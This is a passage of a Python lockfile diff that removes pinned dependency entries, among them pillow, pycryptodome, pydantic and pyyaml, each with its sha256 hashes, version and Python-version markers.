"sha256:0d60fbae8e0019865fc4784745814cff1c421df5afee233db6d88ab4f14655a2", - "sha256:1a1329e26f46230bf77b02cc19e900db9b52f398d6722ca853349a782d4cff55", - "sha256:1b9735c27cea5d995496f46a8b1cd7b408b3f34b6d50459d9ac8fe3a20cc17bf", - "sha256:2792d23d62ec51e50ce4d4b7d73de8f67a2fd3ea710dcbc8563a51a03fb07b01", - "sha256:3e0746410e73384e70d286f93abf2520035250aad8c5714240b0492a7302fdca", - "sha256:4c3abc71e8b6edba80a01a52e66d83c5d14433cbcd26a40c329ec7ed09f37901", - "sha256:5883c06bb92f2e6c8181df7b39971a5fb436288db58b5a1c3967702d4278691d", - "sha256:5c97325a0ba6f9d041feb9390924614b60b99209a71a69c876f71052521d42a4", - "sha256:60e7f0f7f6d0eee8364b9a6304c2845b9c491ac706048c7e8cf47b83123b8dbf", - "sha256:76b4115d42a7dfc5d485d358728cdd8719be33cc5ec6ec08632a5d6fca2ed380", - "sha256:7dc869c0c75988e1c693d0e2d5b26034644399dd929bc049db55395b1379e044", - "sha256:834b386f2b8210dca38c71a6e0f4fd6922f7d3fcff935dbe3a570945acb1b545", - "sha256:8b77775f4b7df768967a7c8b3567e309f617dd5e99aeb886fa14dc1a0791141f", - "sha256:90319e4f002795ccfc9050110bbbaa16c944b1c37c0baeea43c5fb881693ae1f", - "sha256:b79e513d7aac42ae918db3ad1341a015488530d0bb2a6abcbdd10a3a829ccfd3", - "sha256:bb33d5a1cf360304754913a350edda36d5b8c5331a8237268c48f91253c3a364", - "sha256:bec1e7213c7cb00d67093247f8c4db156fd03075f49876957dca4711306d39c9", - "sha256:c5462d19336db4560041517dbb7759c21d181a67cb01b36ca109b2ae37d32418", - "sha256:c5652ea24d33585ea39eb6a6a15dac87a1206a692719ff45d53c5282e66d4a8f", - "sha256:d7806500e4f5bdd04095e849265e55de20d8cc4b661b038957354327f6d9b295", - "sha256:db3ccc4e37a6873045580d413fe79b68e47a681af8db2e046f1dacfa11f86eb3", - "sha256:dfe4a913e29b418d096e696ddd422d8a5d13ffba4ea91f9f60440a3b759b0187", - "sha256:eb942bfb6f84df5ce05dbf4b46673ffed0d3da59f13635ea9b926af3deb76926", - "sha256:f08f2e037bba04e707eebf4bc934f1972a315c883a9e0ebfa8a7756eabf9e357", - "sha256:fd608e19c8d7c55021dffd43bfe5492fab8cc105cc8986f813f8c3c048b38760" - ], - "markers": "python_version >= '3.9'", - "version": "==1.25.2" - }, - "odfpy": { - "hashes": [ - "sha256:db766a6e59c5103212f3cc92ec8dd50a0f3a02790233ed0b52148b70d3c438ec", - "sha256:fc3b8d1bc098eba4a0fda865a76d9d1e577c4ceec771426bcb169a82c5e9dfe0" - ], - "version": "==1.4.1" - }, - "openpyxl": { - "hashes": [ - "sha256:40f568b9829bf9e446acfffce30250ac1fa39035124d55fc024025c41481c90f", - "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==3.0.9" - }, - "oss2": { - "hashes": [ - "sha256:8548ea7d43326f6fd679bc8b79b3a2dfbfe9c6a60ed57e2410818fec57023dda" - ], - "index": "pypi", - "version": "==2.13.1" - }, - "packaging": { - "hashes": [ - "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb", - "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==21.3" - }, - "pep8": { - "hashes": [ - "sha256:b22cfae5db09833bb9bd7c8463b53e1a9c9b39f12e304a8d0bba729c501827ee", - "sha256:fe249b52e20498e59e0b5c5256aa52ee99fc295b26ec9eaa85776ffdb9fe6374" - ], - "index": "pypi", - "version": "==1.7.1" - }, - "pillow": { - "hashes": [ - "sha256:03150abd92771742d4a8cd6f2fa6246d847dcd2e332a18d0c15cc75bf6703040", - "sha256:073adb2ae23431d3b9bcbcff3fe698b62ed47211d0716b067385538a1b0f28b8", - "sha256:0b07fffc13f474264c336298d1b4ce01d9c5a011415b79d4ee5527bb69ae6f65", - "sha256:0b7257127d646ff8676ec8a15520013a698d1fdc48bc2a79ba4e53df792526f2", - "sha256:12ce4932caf2ddf3e41d17fc9c02d67126935a44b86df6a206cf0d7161548627", - "sha256:15c42fb9dea42465dfd902fb0ecf584b8848ceb28b41ee2b58f866411be33f07", - "sha256:18498994b29e1cf86d505edcb7edbe814d133d2232d256db8c7a8ceb34d18cef", - "sha256:1c7c8ae3864846fc95f4611c78129301e203aaa2af813b703c55d10cc1628535", - "sha256:22b012ea2d065fd163ca096f4e37e47cd8b59cf4b0fd47bfca6abb93df70b34c", - "sha256:276a5ca930c913f714e372b2591a22c4bd3b81a418c0f6635ba832daec1cbcfc", - "sha256:2e0918e03aa0c72ea56edbb00d4d664294815aa11291a11504a377ea018330d3", - "sha256:3033fbe1feb1b59394615a1cafaee85e49d01b51d54de0cbf6aa8e64182518a1", - "sha256:3168434d303babf495d4ba58fc22d6604f6e2afb97adc6a423e917dab828939c", - "sha256:32a44128c4bdca7f31de5be641187367fe2a450ad83b833ef78910397db491aa", - "sha256:3dd6caf940756101205dffc5367babf288a30043d35f80936f9bfb37f8355b32", - "sha256:40e1ce476a7804b0fb74bcfa80b0a2206ea6a882938eaba917f7a0f004b42502", - "sha256:41e0051336807468be450d52b8edd12ac60bebaa97fe10c8b660f116e50b30e4", - "sha256:4390e9ce199fc1951fcfa65795f239a8a4944117b5935a9317fb320e7767b40f", - "sha256:502526a2cbfa431d9fc2a079bdd9061a2397b842bb6bc4239bb176da00993812", - "sha256:51e0e543a33ed92db9f5ef69a0356e0b1a7a6b6a71b80df99f1d181ae5875636", - "sha256:57751894f6618fd4308ed8e0c36c333e2f5469744c34729a27532b3db106ee20", - "sha256:5d77adcd56a42d00cc1be30843d3426aa4e660cab4a61021dc84467123f7a00c", - "sha256:655a83b0058ba47c7c52e4e2df5ecf484c1b0b0349805896dd350cbc416bdd91", - "sha256:68943d632f1f9e3dce98908e873b3a090f6cba1cbb1b892a9e8d97c938871fbe", - "sha256:6c738585d7a9961d8c2821a1eb3dcb978d14e238be3d70f0a706f7fa9316946b", - "sha256:73bd195e43f3fadecfc50c682f5055ec32ee2c933243cafbfdec69ab1aa87cad", - "sha256:772a91fc0e03eaf922c63badeca75e91baa80fe2f5f87bdaed4280662aad25c9", - "sha256:77ec3e7be99629898c9a6d24a09de089fa5356ee408cdffffe62d67bb75fdd72", - "sha256:7db8b751ad307d7cf238f02101e8e36a128a6cb199326e867d1398067381bff4", - "sha256:801ec82e4188e935c7f5e22e006d01611d6b41661bba9fe45b60e7ac1a8f84de", - "sha256:82409ffe29d70fd733ff3c1025a602abb3e67405d41b9403b00b01debc4c9a29", - "sha256:828989c45c245518065a110434246c44a56a8b2b2f6347d1409c787e6e4651ee", - "sha256:829f97c8e258593b9daa80638aee3789b7df9da5cf1336035016d76f03b8860c", - "sha256:871b72c3643e516db4ecf20efe735deb27fe30ca17800e661d769faab45a18d7", - "sha256:89dca0ce00a2b49024df6325925555d406b14aa3efc2f752dbb5940c52c56b11", - "sha256:90fb88843d3902fe7c9586d439d1e8c05258f41da473952aa8b328d8b907498c", - "sha256:97aabc5c50312afa5e0a2b07c17d4ac5e865b250986f8afe2b02d772567a380c", - "sha256:9aaa107275d8527e9d6e7670b64aabaaa36e5b6bd71a1015ddd21da0d4e06448", - "sha256:9f47eabcd2ded7698106b05c2c338672d16a6f2a485e74481f524e2a23c2794b", - "sha256:a0a06a052c5f37b4ed81c613a455a81f9a3a69429b4fd7bb913c3fa98abefc20", - "sha256:ab388aaa3f6ce52ac1cb8e122c4bd46657c15905904b3120a6248b5b8b0bc228", - "sha256:ad58d27a5b0262c0c19b47d54c5802db9b34d38bbf886665b626aff83c74bacd", - "sha256:ae5331c23ce118c53b172fa64a4c037eb83c9165aba3a7ba9ddd3ec9fa64a699", - "sha256:af0372acb5d3598f36ec0914deed2a63f6bcdb7b606da04dc19a88d31bf0c05b", - "sha256:afa4107d1b306cdf8953edde0534562607fe8811b6c4d9a486298ad31de733b2", - "sha256:b03ae6f1a1878233ac620c98f3459f79fd77c7e3c2b20d460284e1fb370557d4", - "sha256:b0915e734b33a474d76c28e07292f196cdf2a590a0d25bcc06e64e545f2d146c", - "sha256:b4012d06c846dc2b80651b120e2cdd787b013deb39c09f407727ba90015c684f", - "sha256:b472b5ea442148d1c3e2209f20f1e0bb0eb556538690fa70b5e1f79fa0ba8dc2", - "sha256:b59430236b8e58840a0dfb4099a0e8717ffb779c952426a69ae435ca1f57210c", - "sha256:b90f7616ea170e92820775ed47e136208e04c967271c9ef615b6fbd08d9af0e3", - "sha256:b9a65733d103311331875c1dca05cb4606997fd33d6acfed695b1232ba1df193", - "sha256:bac18ab8d2d1e6b4ce25e3424f709aceef668347db8637c2296bcf41acb7cf48", - "sha256:bca31dd6014cb8b0b2db1e46081b0ca7d936f856da3b39744aef499db5d84d02", - "sha256:be55f8457cd1eac957af0c3f5ece7bc3f033f89b114ef30f710882717670b2a8", - "sha256:c7025dce65566eb6e89f56c9509d4f628fddcedb131d9465cacd3d8bac337e7e", - "sha256:c935a22a557a560108d780f9a0fc426dd7459940dc54faa49d83249c8d3e760f", - "sha256:dbb8e7f2abee51cef77673be97760abff1674ed32847ce04b4af90f610144c7b", - "sha256:e6ea6b856a74d560d9326c0f5895ef8050126acfdc7ca08ad703eb0081e82b74", - "sha256:ebf2029c1f464c59b8bdbe5143c79fa2045a581ac53679733d3a91d400ff9efb", - "sha256:f1ff2ee69f10f13a9596480335f406dd1f70c3650349e2be67ca3139280cade0" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==9.3.0" - }, - "prometheus-client": { - "hashes": [ - "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091", - "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101" - ], - "markers": "python_version >= '3.6'", - "version": "==0.17.1" - }, - "prompt-toolkit": { - "hashes": [ - "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac", - "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88" - ], - "markers": "python_full_version >= '3.7.0'", - "version": "==3.0.39" - }, - "pycodestyle": { - "hashes": [ - "sha256:259bcc17857d8a8b3b4a2327324b79e5f020a13c16074670f9c8c8f872ea76d0", - "sha256:5d1013ba8dc7895b548be5afb05740ca82454fd899971563d2ef625d090326f8" - ], - "markers": "python_version >= '3.8'", - "version": "==2.11.0" - }, - "pycparser": { - "hashes": [ - "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9", - "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206" - ], - "version": "==2.21" - }, - "pycryptodome": { - "hashes": [ - "sha256:01489bbdf709d993f3058e2996f8f40fee3f0ea4d995002e5968965fa2fe89fb", - "sha256:10da29526a2a927c7d64b8f34592f461d92ae55fc97981aab5bbcde8cb465bb6", - "sha256:12600268763e6fec3cefe4c2dcdf79bde08d0b6dc1813887e789e495cb9f3403", - "sha256:157c9b5ba5e21b375f052ca78152dd309a09ed04703fd3721dce3ff8ecced148", - "sha256:16bfd98dbe472c263ed2821284118d899c76968db1a6665ade0c46805e6b29a4", - "sha256:363dd6f21f848301c2dcdeb3c8ae5f0dee2286a5e952a0f04954b82076f23825", - "sha256:3811e31e1ac3069988f7a1c9ee7331b942e605dfc0f27330a9ea5997e965efb2", - "sha256:422c89fd8df8a3bee09fb8d52aaa1e996120eafa565437392b781abec2a56e14", - "sha256:4604816adebd4faf8810782f137f8426bf45fee97d8427fa8e1e49ea78a52e2c", - "sha256:4944defabe2ace4803f99543445c27dd1edbe86d7d4edb87b256476a91e9ffa4", - "sha256:51eae079ddb9c5f10376b4131be9589a6554f6fd84f7f655180937f611cd99a2", - "sha256:53aee6be8b9b6da25ccd9028caf17dcdce3604f2c7862f5167777b707fbfb6cb", - "sha256:62a1e8847fabb5213ccde38915563140a5b338f0d0a0d363f996b51e4a6165cf", - "sha256:6f4b967bb11baea9128ec88c3d02f55a3e338361f5e4934f5240afcb667fdaec", - "sha256:78d863476e6bad2a592645072cc489bb90320972115d8995bcfbee2f8b209918", - "sha256:795bd1e4258a2c689c0b1f13ce9684fa0dd4c0e08680dcf597cf9516ed6bc0f3", - "sha256:7a3d22c8ee63de22336679e021c7f2386f7fc465477d59675caa0e5706387944", - "sha256:83c75952dcf4a4cebaa850fa257d7a860644c70a7cd54262c237c9f2be26f76e", - "sha256:928078c530da78ff08e10eb6cada6e0dff386bf3d9fa9871b4bbc9fbc1efe024", - "sha256:957b221d062d5752716923d14e0926f47670e95fead9d240fa4d4862214b9b2f", - "sha256:9ad6f09f670c466aac94a40798e0e8d1ef2aa04589c29faa5b9b97566611d1d1", - "sha256:9c8eda4f260072f7dbe42f473906c659dcbadd5ae6159dfb49af4da1293ae380", - "sha256:b1d9701d10303eec8d0bd33fa54d44e67b8be74ab449052a8372f12a66f93fb9", - "sha256:b6a610f8bfe67eab980d6236fdc73bfcdae23c9ed5548192bb2d530e8a92780e", - "sha256:c9adee653fc882d98956e33ca2c1fb582e23a8af7ac82fee75bd6113c55a0413", - "sha256:cb1be4d5af7f355e7d41d36d8eec156ef1382a88638e8032215c215b82a4b8ec", - "sha256:d1497a8cd4728db0e0da3c304856cb37c0c4e3d0b36fcbabcc1600f18504fc54", - "sha256:d20082bdac9218649f6abe0b885927be25a917e29ae0502eaf2b53f1233ce0c2", - "sha256:e8ad74044e5f5d2456c11ed4cfd3e34b8d4898c0cb201c4038fe41458a82ea27", - "sha256:f022a4fd2a5263a5c483a2bb165f9cb27f2be06f2f477113783efe3fe2ad887b", - "sha256:f21efb8438971aa16924790e1c3dba3a33164eb4000106a55baaed522c261acf", - "sha256:fc0a73f4db1e31d4a6d71b672a48f3af458f548059aa05e83022d5f61aac9c08" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", - "version": "==3.18.0" - }, - "pycryptodomex": { - "hashes": [ - "sha256:1ca8e1b4c62038bb2da55451385246f51f412c5f5eabd64812c01766a5989b4a", - "sha256:298c00ea41a81a491d5b244d295d18369e5aac4b61b77b2de5b249ca61cd6659", - "sha256:2aa887683eee493e015545bd69d3d21ac8d5ad582674ec98f4af84511e353e45", - "sha256:2ce76ed0081fd6ac8c74edc75b9d14eca2064173af79843c24fa62573263c1f2", - "sha256:3da13c2535b7aea94cc2a6d1b1b37746814c74b6e80790daddd55ca5c120a489", - "sha256:406ec8cfe0c098fadb18d597dc2ee6de4428d640c0ccafa453f3d9b2e58d29e2", - "sha256:4d0db8df9ffae36f416897ad184608d9d7a8c2b46c4612c6bc759b26c073f750", - "sha256:530756d2faa40af4c1f74123e1d889bd07feae45bac2fd32f259a35f7aa74151", - "sha256:77931df40bb5ce5e13f4de2bfc982b2ddc0198971fbd947776c8bb5050896eb2", - "sha256:797a36bd1f69df9e2798e33edb4bd04e5a30478efc08f9428c087f17f65a7045", - "sha256:8085bd0ad2034352eee4d4f3e2da985c2749cb7344b939f4d95ead38c2520859", - "sha256:8536bc08d130cae6dcba1ea689f2913dfd332d06113904d171f2f56da6228e89", - "sha256:a4d412eba5679ede84b41dbe48b1bed8f33131ab9db06c238a235334733acc5e", - "sha256:aebecde2adc4a6847094d3bd6a8a9538ef3438a5ea84ac1983fcb167db614461", - "sha256:b276cc4deb4a80f9dfd47a41ebb464b1fe91efd8b1b8620cf5ccf8b824b850d6", - "sha256:b5a185ae79f899b01ca49f365bdf15a45d78d9856f09b0de1a41b92afce1a07f", - "sha256:c4d8977ccda886d88dc3ca789de2f1adc714df912ff3934b3d0a3f3d777deafb", - "sha256:c5dd3ffa663c982d7f1be9eb494a8924f6d40e2e2f7d1d27384cfab1b2ac0662", - "sha256:ca88f2f7020002638276439a01ffbb0355634907d1aa5ca91f3dc0c2e44e8f3b", - "sha256:d2cce1c82a7845d7e2e8a0956c6b7ed3f1661c9acf18eb120fc71e098ab5c6fe", - "sha256:d709572d64825d8d59ea112e11cc7faf6007f294e9951324b7574af4251e4de8", - "sha256:da8db8374295fb532b4b0c467e66800ef17d100e4d5faa2bbbd6df35502da125", - "sha256:e36c7e3b5382cd5669cf199c4a04a0279a43b2a3bdd77627e9b89778ac9ec08c", - "sha256:e95a4a6c54d27a84a4624d2af8bb9ee178111604653194ca6880c98dcad92f48", - "sha256:ee835def05622e0c8b1435a906491760a43d0c462f065ec9143ec4b8d79f8bff", - "sha256:f75009715dcf4a3d680c2338ab19dac5498f8121173a929872950f4fb3a48fbf", - "sha256:f8524b8bc89470cec7ac51734907818d3620fb1637f8f8b542d650ebec42a126" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", - "version": "==3.14.1" - }, - "pydantic": { - "hashes": [ - "sha256:0fe8a415cea8f340e7a9af9c54fc71a649b43e8ca3cc732986116b3cb135d303", - "sha256:1289c180abd4bd4555bb927c42ee42abc3aee02b0fb2d1223fb7c6e5bef87dbe", - "sha256:1eb2085c13bce1612da8537b2d90f549c8cbb05c67e8f22854e201bde5d98a47", - "sha256:2031de0967c279df0d8a1c72b4ffc411ecd06bac607a212892757db7462fc494", - "sha256:2a7bac939fa326db1ab741c9d7f44c565a1d1e80908b3797f7f81a4f86bc8d33", - "sha256:2d5a58feb9a39f481eda4d5ca220aa8b9d4f21a41274760b9bc66bfd72595b86", - "sha256:2f9a6fab5f82ada41d56b0602606a5506aab165ca54e52bc4545028382ef1c5d", - "sha256:2fcfb5296d7877af406ba1547dfde9943b1256d8928732267e2653c26938cd9c", - "sha256:549a8e3d81df0a85226963611950b12d2d334f214436a19537b2efed61b7639a", - "sha256:598da88dfa127b666852bef6d0d796573a8cf5009ffd62104094a4fe39599565", - "sha256:5d1197e462e0364906cbc19681605cb7c036f2475c899b6f296104ad42b9f5fb", - "sha256:69328e15cfda2c392da4e713443c7dbffa1505bc9d566e71e55abe14c97ddc62", - "sha256:6a9dfa722316f4acf4460afdf5d41d5246a80e249c7ff475c43a3a1e9d75cf62", - "sha256:6b30bcb8cbfccfcf02acb8f1a261143fab622831d9c0989707e0e659f77a18e0", - "sha256:6c076be61cd0177a8433c0adcb03475baf4ee91edf5a4e550161ad57fc90f523", - "sha256:771735dc43cf8383959dc9b90aa281f0b6092321ca98677c5fb6125a6f56d58d", - "sha256:795e34e6cc065f8f498c89b894a3c6da294a936ee71e644e4bd44de048af1405", - "sha256:87afda5539d5140cb8ba9e8b8c8865cb5b1463924d38490d73d3ccfd80896b3f", - "sha256:8fb2aa3ab3728d950bcc885a2e9eff6c8fc40bc0b7bb434e555c215491bcf48b", - "sha256:a1fcb59f2f355ec350073af41d927bf83a63b50e640f4dbaa01053a28b7a7718", - "sha256:a5e7add47a5b5a40c49b3036d464e3c7802f8ae0d1e66035ea16aa5b7a3923ed", - "sha256:a73f489aebd0c2121ed974054cb2759af8a9f747de120acd2c3394cf84176ccb", - "sha256:ab26038b8375581dc832a63c948f261ae0aa21f1d34c1293469f135fa92972a5", - "sha256:b0d191db0f92dfcb1dec210ca244fdae5cbe918c6050b342d619c09d31eea0cc", - "sha256:b749a43aa51e32839c9d71dc67eb1e4221bb04af1033a32e3923d46f9effa942", - "sha256:b7ccf02d7eb340b216ec33e53a3a629856afe1c6e0ef91d84a4e6f2fb2ca70fe", - "sha256:ba5b2e6fe6ca2b7e013398bc7d7b170e21cce322d266ffcd57cca313e54fb246", - "sha256:ba5c4a8552bff16c61882db58544116d021d0b31ee7c66958d14cf386a5b5350", - "sha256:c79e6a11a07da7374f46970410b41d5e266f7f38f6a17a9c4823db80dadf4303", - "sha256:ca48477862372ac3770969b9d75f1bf66131d386dba79506c46d75e6b48c1e09", - "sha256:dea7adcc33d5d105896401a1f37d56b47d443a2b2605ff8a969a0ed5543f7e33", - "sha256:e0a16d274b588767602b7646fa05af2782576a6cf1022f4ba74cbb4db66f6ca8", - "sha256:e4129b528c6baa99a429f97ce733fff478ec955513630e61b49804b6cf9b224a", - "sha256:e5f805d2d5d0a41633651a73fa4ecdd0b3d7a49de4ec3fadf062fe16501ddbf1", - "sha256:ef6c96b2baa2100ec91a4b428f80d8f28a3c9e53568219b6c298c1125572ebc6", - "sha256:fdbdd1d630195689f325c9ef1a12900524dceb503b00a987663ff4f58669b93d" - ], - "markers": "python_version >= '3.7'", - "version": "==1.10.12" - }, - "pymysql": { - "hashes": [ - "sha256:41fc3a0c5013d5f039639442321185532e3e2c8924687abe6537de157d403641", - "sha256:816927a350f38d56072aeca5dfb10221fe1dc653745853d30a216637f5d7ad36" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==1.0.2" - }, - "pyparsing": { - "hashes": [ - "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb", - "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db" - ], - "markers": "python_full_version >= '3.6.8'", - "version": "==3.1.1" - }, - "pyre2": { - "hashes": [ - "sha256:18cd5d76973ee57232a5d851489c202105e4752aee6dcbd38742c0475f3f1c4e", - "sha256:1efec117f2543b38adcbe038a2ae156eb91b6ed8a73c998c3752a766d6241075", - "sha256:225784d7bd905bc3e87d4bbcc6ac4087ccea8905dd657273fd71bfb113e50e82", - "sha256:310d5c98495114692940ffa020aaeef1341427755b6ca5a17c63092060ed93dc", - "sha256:608558276d3539002ad6300d0b0a2b0941577fdea009715ff4d31052e05cb409", - "sha256:617c4d75b41b34afe7590e144efad1c564a8b49a1e0827872afc2243b24beada", - "sha256:6d8e550899886ee01f1b8149ba1c336e1c749cec2e33414815a76fb5649cdf67", - "sha256:6fe972c0cadec49a5a055690e5aa29f8aebaed0fa9b7d8d3530e33719b61f91c", - "sha256:7c398942c3467fe23b2dd4a11dd78da8aee774d0b481e84b1b208819ee724cca", - "sha256:961020835a3b805eed51a082e5effdccb51979c4efef2a17f17122967cb4749a", - "sha256:97de5d4cf7d8b9be7dbe0dc0941c4a6c1395fc598722d9644adc55427d3dd083", - "sha256:b87e9aeee74376210bd82c8328eb007b93378f3cd61fa6176161c3b9037e8474", - "sha256:c3b45f789374d0f95866330fcd34bb6b93705e8f5c276d9d70d318a227ba5954", - "sha256:cc180989186f05b75020b53c79059c338e9e1940d325fc945c84aab2b5c57525", - "sha256:ebe92a3222f2f6f176eeb3859638734e4f9a82d5940ad7d6f0c1288153c70ce2", - "sha256:f3467dd9a4c8100f6406bc6277d945a13b7fd7c4426d2415564de1324b5db94f", - "sha256:f3ae7b087abcbc4b910d535c2fb877ef452b61d2514a63fd15b8b020b51fe4b5" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==0.3.6" - }, - "pyrsistent": { - "hashes": [ - "sha256:06579d46d8ad69529b28f88711191a7fe7103c92d04a9f338dc754f71b92efa0", - "sha256:1d0620474d509172e1c50b79d5626bfe1899f174bf650186a50c6ce31289ff52", - "sha256:2032d971711643049b4f2c3ca5155a855d507d73bad26dac8d4349e5c5dd6758", - "sha256:2c641111c3f110379bb9001dbb26b34eb8cafab3d0fa855dc161c391461a4aab", - "sha256:327f99800d04a9abcf580daecfd6dd4bfdb4a7e61c71bf2cd1189ef1ca44bade", - "sha256:39f15ad754384e744ac8b00805913bfa66c41131faaa3e4c45c4af0731f3e8f6", - "sha256:4c58bd93c4d502f52938fccdbe6c9d70df3a585c6b39d900fab5f76b604282aa", - "sha256:62a41037387ae849a493cd945e22b34d167a843d57f75b07dbfad6d96cef485c", - "sha256:62b704f18526a8fc243152de8f3f40ae39c5172baff10f50c0c5d5331d6f2342", - "sha256:6df99c3578dc4eb33f3eb26bc28277ab40a720b71649d940bff9c1f704377772", - "sha256:6ef7430e45c5fa0bb6c361cada4a08ed9c184b5ed086815a85c3bc8c5054566b", - "sha256:73b2db09fe15b6e444c0bd566a125a385ca6493456224ce8b367d734f079f576", - "sha256:73d4ec2997716af3c8f28f7e3d3a565d273a598982d2fe95639e07ce4db5da45", - "sha256:73e3e2fd9da009d558050697cc22ad689f89a14a2ef2e67304628a913e59c947", - "sha256:890f577aec554f142e01daf890221d10e4f93a9b1107998d631d3f075b55e8f8", - "sha256:8a34a2a8b220247658f7ced871197c390b3a6371d796a5869ab1c62abe0be527", - "sha256:8bc23e9ddcb523c3ffb4d712aa0bd5bc67b34ff4e2b23fb557012171bdb4013a", - "sha256:945297fc344fef4d540135180ce7babeb2291d124698cc6282f3eac624aa5e82", - "sha256:aaa869d9199d7d4c70a57678aff21654cc179c0c32bcfde87f1d65d0ff47e520", - "sha256:bc33fc20ddfd89b86b7710142963490d8c4ee8307ed6cc5e189a58fa72390eb9", - "sha256:cfe6d8b293d123255fd3b475b5f4e851eb5cbaee2064c8933aa27344381744ae", - "sha256:d16ac5ab3d9db78fed40c884d67079524e4cf8276639211ad9e6fa73e727727e" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==0.19.1" - }, - "python-crontab": { - "hashes": [ - "sha256:6d5ba3c190ec76e4d252989a1644fcb233dbf53fbc8fceeb9febe1657b9fb1d4", - "sha256:79fb7465039ddfd4fb93d072d6ee0d45c1ac8bf1597f0686ea14fd4361dba379" - ], - "version": "==3.0.0" - }, - "python-dateutil": { - "hashes": [ - "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86", - "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==2.8.2" - }, - "python-docx": { - "hashes": [ - "sha256:1105d233a0956dd8dd1e710d20b159e2d72ac3c301041b95f4d4ceb3e0ebebc4" - ], - "index": "pypi", - "version": "==0.8.11" - }, - "python-json-logger": { - "hashes": [ - "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c", - "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==2.0.7" - }, - "pytz": { - "hashes": [ - "sha256:222439474e9c98fced559f1709d89e6c9cbf8d79c794ff3eb9f8800064291427", - "sha256:e89512406b793ca39f5971bc999cc538ce125c0e51c27941bef4568b460095e2" - ], - "index": "pypi", - "version": "==2022.6" - }, - "pyyaml": { - "hashes": [ - "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc", - "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741", - "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206", - "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27", - "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595", - "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62", - "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98", - "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696", - "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d", - "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867", - "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47", - "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486", - "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6", - "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3", - "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007", - "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938", - "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c", - "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735", - "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d", - "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba", - "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8", - "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5", - "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd", - "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3", - "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0", - "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515", - "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c", - "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c", - "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924", - "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34", - "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43", - "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859", - 